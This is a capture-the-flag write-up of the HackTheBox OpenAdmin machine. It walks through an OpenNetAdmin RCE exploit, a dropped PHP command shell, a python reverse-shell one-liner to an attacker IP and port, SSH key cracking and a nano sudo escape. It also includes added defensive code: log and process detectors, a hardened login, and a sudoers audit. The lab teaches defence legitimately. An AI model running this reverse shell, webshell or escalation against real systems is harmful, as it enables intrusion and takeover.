# HackTheBox-OpenAdmin

## NMAP

```bash
nmap -p- -sC -sV --min-rate 5000 IP

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCcVHOWV8MC41kgTdwiBIBmUrM8vGHUM2Q7+a0LCl9jfH3bIpmuWnzwev97wpc8pRHPuKfKm0c3iHGII+cKSsVgzVtJfQdQ0j/GyDcBQ9s1VGHiYIjbpX30eM2P2N5g2hy9ZWsF36WMoo5Fr+mPNycf6Mf0QOODMVqbmE3VVZE1VlX3pNW4ZkMIpDSUR89JhH+PHz/miZ1OhBdSoNWYJIuWyn8DWLCGBQ7THxxYOfN1bwhfYRCRTv46tiayuF2NNKWaDqDq/DXZxSYjwpSVelFV+vybL6nU0f28PzpQsmvPab4PtMUb0epaj4ZFcB1VVITVCdBsiu4SpZDdElxkuQJz
|   256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHqbD5jGewKxd8heN452cfS5LS/VdUroTScThdV8IiZdTxgSaXN1Qga4audhlYIGSyDdTEL8x2tPAFPpvipRrLE=
|   256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBcV0sVI0yWfjKsl7++B9FGfOVeWAIWZ4YGEMROPxxk4
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_  Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
```

## PORT 80 (HTTP)

On the web server we only get the Apache default web page. I tried to see if it had something in `robots.txt`, but that file didn't exist, so I decided to run `gobuster` to fuzz for files and directories.

Going to `music` we can see an HTML template page. There's a login link which takes us to the `OpenNetAdmin` page, an application for managing IP addresses, DNS, subnets, etc. It also exposes the version of OpenNetAdmin, which is 18.1.1.

On googling for exploits for version `18.1.1` we can see a GitHub repo with a PoC for remote code execution: https://github.com/amriunix/ona-rce

We can use the PoC to check whether the target is vulnerable or not. But when running the exploit it breaks, so I went to
`exploit-db` and tried that exploit, and this one worked perfectly.

I tried getting a reverse shell again so that I could stabilize it, but it wasn't working. I made a simple PHP file with a GET parameter named `cmd`, which is executed through the `system` function (it runs shell commands and outputs the result). Then I hosted this file using `python3` and downloaded it on the target machine using `wget`.

Using a python3 reverse shell I was able to get a proper shell:

```bash
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.84",2222));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
```

Here I have just stabilized the shell so we have the ability to clear the terminal screen and use bash history with the up and down arrow keys.

We can go into the `/home` directory to see how many users there are. There are 2 users, but we can't navigate into their folders as `www-data` doesn't have permission to view them.

We can look for any cronjobs running through `cat /etc/crontab`. Nothing there; next we can look for open ports. Here we can see port 3306, which is for the database. We can try to view the database password and see if it works for either one of the users. In `/opt/ona/www/local/config` we can see a database settings file. Let's try this password on `jimmy`. Perfect, this worked!
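From the defender's side, the two things this stage leaves on the host are requests to a PHP file carrying a command in a query parameter and a python one-liner in the process table. The following is an added example, not code from the writeup: a small detector for both, run over constructed Apache access-log lines and constructed process command lines (the reverse-shell command line is the one shown above). The parameter names `command` and `exec` next to `cmd` are an assumption to tune for your own logs.

```python
"""Detection helpers for the artefacts of this stage: requests to a PHP file that
carry a shell command in a query parameter, and a python reverse-shell one-liner in
a process command line. Added example; sample data is constructed, not from the box."""
import re
from typing import Dict, Iterable, List, Optional
from urllib.parse import parse_qs, urlsplit

# Apache "combined" access-log format.
_ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Query-parameter names a dropped PHP file typically reads its command from.
# `cmd` is the one used above; the other two are an assumption to tune for your logs.
COMMAND_PARAMS = ("cmd", "command", "exec")

# Constructed sample: two ordinary requests, then two that drive a `cmd` parameter.
SAMPLE_ACCESS_LOG = [
    '10.10.14.84 - - [01/Jan/2020:10:00:01 +0000] "GET /music/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '10.10.14.84 - - [01/Jan/2020:10:00:05 +0000] "GET /ona/login.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '10.10.14.84 - - [01/Jan/2020:10:01:12 +0000] "GET /ona/x.php?cmd=id HTTP/1.1" 200 64 "-" "curl/7.58.0"',
    '10.10.14.84 - - [01/Jan/2020:10:01:30 +0000] "GET /ona/x.php?cmd=whoami HTTP/1.1" 200 16 "-" "curl/7.58.0"',
]

# The reverse-shell command line used above, as a process feed would report it.
REVERSE_SHELL_CMDLINE = (
    "python3 -c 'import socket,subprocess,os;"
    "s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);"
    's.connect(("10.10.14.84",2222));'
    "os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);"
    'import pty; pty.spawn("/bin/bash")\''
)

# Constructed sample of process command lines: the reverse shell plus benign python use.
SAMPLE_CMDLINES = [
    REVERSE_SHELL_CMDLINE,
    "python3 -c 'print(1)'",
    "python3 manage.py runserver",
    "python3 -m http.server 8000",
]


def parse_access_line(line: str) -> Optional[Dict[str, str]]:
    """Return the fields of one combined-format line, or None if it does not match."""
    m = _ACCESS_RE.match(line.strip())
    return m.groupdict() if m else None


def find_webshell_requests(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Flag requests for a .php resource whose query string carries a command parameter."""
    hits = []
    for line in lines:
        rec = parse_access_line(line)
        if rec is None:
            continue
        url = urlsplit(rec["target"])
        if not url.path.lower().endswith(".php"):
            continue
        params = parse_qs(url.query, keep_blank_values=True)  # also percent-decodes
        for name in COMMAND_PARAMS:
            if name in params:
                hits.append({"ip": rec["ip"], "time": rec["time"], "path": url.path,
                             "param": name, "command": params[name][0],
                             "user_agent": rec["ua"]})
    return hits


# A python reverse shell needs all three: a TCP connect, the socket duplicated onto
# stdin/stdout/stderr, and an interactive shell spawned on top of it.
_PY_INVOCATION = re.compile(r"\bpython[0-9.]*\s+-c\b")
_SHELL_SPAWN = re.compile(r"pty\.spawn\(|/bin/(?:ba)?sh\b")


def is_reverse_shell_cmdline(cmdline: str) -> bool:
    """True when a process command line looks like a python reverse shell."""
    if not _PY_INVOCATION.search(cmdline):
        return False
    has_connect = "socket" in cmdline and ".connect(" in cmdline
    has_dup2 = "dup2(" in cmdline
    return has_connect and has_dup2 and bool(_SHELL_SPAWN.search(cmdline))


def flag_reverse_shells(cmdlines: Iterable[str]) -> List[str]:
    """Return the command lines that match the reverse-shell pattern."""
    return [c for c in cmdlines if is_reverse_shell_cmdline(c)]


if __name__ == "__main__":
    for hit in find_webshell_requests(SAMPLE_ACCESS_LOG):
        print(f"webshell-style request: {hit['ip']} {hit['path']} {hit['param']}={hit['command']!r}")
    for cmd in flag_reverse_shells(SAMPLE_CMDLINES):
        print("reverse shell command line:", cmd[:60], "...")
```

Both checks are deliberately narrow (a `.php` path plus a known parameter name; all three reverse-shell building blocks present) so they produce few false positives; the web-log check in particular would be paired with a file-integrity alert on new `.php` files in the web root, since the dropped file itself is the stronger signal.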
But doing `sudo -l` failed; the user was not allowed to use `sudo`, I guess. This user is in the `internal` group, so maybe there's some folder we can look into.

Looking into `index.php` we can see it's a login page which requires a username and password, and there's a condition that lets us in if we provide the username as `jimmy` or provide the correct password, which we can get by cracking the sha512 hash; on cracking it is `Revealed`.

We can also see a PHP file `main.php` which executes a shell command to read the id_rsa key of `joanna`. If we try to run the PHP file we get a permission denied error, as it's going to be executed as `jimmy`.

If we look at the listening ports on the machine we can see port `52846`. Using `curl` we can make a request on that port, and it seems to be the same page that we saw in the `internal` directory, so this directory is being hosted on port 52846. This means we can navigate to the `main.php` file.

I saved the output of the request to `main.php` in a text file and transferred that file to my machine. On using the private key, it asks for a passphrase. Using `ssh2john` we can get the hash of id_rsa and crack it so we get the passphrase.

Now we have escalated to the second user. On running `sudo -l` we can see we have permission to run `nano` on `/opt/priv`. We can check how to abuse `nano` from GTFOBins: https://gtfobins.github.io/gtfobins/nano/
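The `index.php` check described above fails in two independent ways: the two conditions are joined with OR, so knowing the username alone is enough, and the password is stored as a bare SHA-512 hash, which is fast to crack. The following is an added example, not the box's `index.php`: the weak check rewritten in Python beside a hardened version that requires both factors, stores a salted PBKDF2 hash, and compares in constant time. Every credential, hash and user record here is constructed for the demo.

```python
"""The login weakness described above, side by side with a hardened check.
Added example: the box's index.php is not reproduced, and every credential
and hash here is constructed for the demo."""
import hashlib
import hmac
import os
from typing import Dict, Tuple

# Record layout for the hardened store: (salt, PBKDF2 digest, iteration count).
Record = Tuple[bytes, bytes, int]

# --- Vulnerable pattern -------------------------------------------------------
# Two conditions joined with OR: the username alone grants access, and the
# password is kept as an unsalted SHA-512 hash, which cracks quickly offline.
VULN_USER = "jimmy"
VULN_HASH = hashlib.sha512(b"demo-password").hexdigest()  # constructed, not the box's hash


def vulnerable_login(username: str, password: str) -> bool:
    return (username == VULN_USER
            or hashlib.sha512(password.encode()).hexdigest() == VULN_HASH)


# --- Hardened pattern ---------------------------------------------------------
DEMO_ITERATIONS = 100_000  # kept low so the demo runs quickly; raise for production use


def make_record(password: str, iterations: int = DEMO_ITERATIONS) -> Record:
    """Derive a salted, deliberately slow hash for storage instead of a bare SHA-512."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha512", password.encode(), salt, iterations)
    return salt, digest, iterations


# Used when the username is unknown, so the KDF still runs and timing stays flat.
_DUMMY_RECORD: Record = (b"\x00" * 16, b"\x00" * 64, DEMO_ITERATIONS)


def hardened_login(username: str, password: str, users: Dict[str, Record]) -> bool:
    """Username AND password must both check out; the digest comparison is constant-time."""
    record = users.get(username)
    salt, digest, iterations = record if record is not None else _DUMMY_RECORD
    candidate = hashlib.pbkdf2_hmac("sha512", password.encode(), salt, iterations)
    return record is not None and hmac.compare_digest(candidate, digest)


def build_demo_users() -> Dict[str, Record]:
    """Constructed user store for the demo."""
    return {"jimmy": make_record("demo-password")}


if __name__ == "__main__":
    users = build_demo_users()
    print("vulnerable, username only:", vulnerable_login("jimmy", "wrong"))
    print("vulnerable, password only:", vulnerable_login("nobody", "demo-password"))
    print("hardened, username only  :", hardened_login("jimmy", "wrong", users))
    print("hardened, password only  :", hardened_login("nobody", "demo-password", users))
    print("hardened, both correct   :", hardened_login("jimmy", "demo-password", users))
```

The dummy record exists so that a wrong username costs the same time as a wrong password; without it, response timing would reveal which usernames exist, which is exactly the kind of hint the original page gives away for free.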
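The final step works because a sudo rule allows an interactive editor to run as root, and an editor that can spawn a shell or write any file is equivalent to unrestricted root. The following is an added example, not from the writeup: a small audit that parses sudoers-style user specifications and flags entries whose binary is an editor with a known shell escape. The sample rules are constructed (the `nano` on `/opt/priv` line mirrors the case above); `vi` and `vim` in the editor set are an assumption and the set should be extended from GTFOBins.

```python
"""Audit sudoers-style rules for entries that run an interactive editor as root,
the kind of rule (nano on /opt/priv) the writeup abuses via GTFOBins.
Added example; the rules below are constructed, not the box's sudoers file."""
import os
import re
from typing import Dict, Iterable, List, Optional

# Editors known to offer a shell escape or an arbitrary write when run with sudo.
# nano is the case above; vi and vim are an assumption added here. Extend from GTFOBins.
ESCAPABLE_EDITORS = {"nano", "vi", "vim"}

# user  host = (runas) [tags:] command[, command...]
_RULE_RE = re.compile(
    r"^(?P<who>[^\s=]+)\s+(?P<host>[^\s=]+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$"
)
_TAG_RE = re.compile(r"^(?:(?:NOPASSWD|PASSWD|NOEXEC|EXEC|SETENV|NOSETENV):\s*)+")

# Constructed sample sudoers content.
SAMPLE_SUDOERS = [
    "# constructed sample",
    "Defaults env_reset",
    "root ALL=(ALL:ALL) ALL",
    "%admin ALL=(ALL) ALL",
    "joanna ALL=(ALL) NOPASSWD: /bin/nano /opt/priv",
    "backup ALL=(root) NOPASSWD: /usr/bin/rsync, /usr/bin/tar",
]


def parse_rule(line: str) -> Optional[Dict[str, Optional[str]]]:
    """Return the parts of one user-specification line, or None for comments and Defaults."""
    line = line.strip()
    if not line or line.startswith("#") or line.startswith("Defaults"):
        return None
    m = _RULE_RE.match(line)
    return m.groupdict() if m else None


def audit_sudoers(lines: Iterable[str]) -> List[Dict[str, object]]:
    """Flag every command entry whose binary is an escapable editor."""
    findings: List[Dict[str, object]] = []
    for line in lines:
        rule = parse_rule(line)
        if rule is None:
            continue
        for entry in rule["cmds"].split(","):
            entry = entry.strip()
            tags = _TAG_RE.match(entry)
            command = entry[tags.end():] if tags else entry
            words = command.split()
            binary = os.path.basename(words[0]) if words else ""
            if binary in ESCAPABLE_EDITORS:
                findings.append({
                    "who": rule["who"],
                    "runas": rule["runas"] or "root",  # sudo defaults to root when unspecified
                    "binary": binary,
                    "command": command,
                    "nopasswd": bool(tags and "NOPASSWD:" in tags.group(0)),
                })
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{f['who']} may run {f['command']} as {f['runas']}"
              f"{' without a password' if f['nopasswd'] else ''}: {f['binary']} can escape to a shell")
```

The fix for the flagged rule is not a different editor but a different mechanism: grant `sudoedit` (equivalently `sudo -e`) on the file instead, which copies it to a temporary location, runs the editor as the invoking user, and writes the result back only when the user closes the editor, so the privileged step never involves an interactive program.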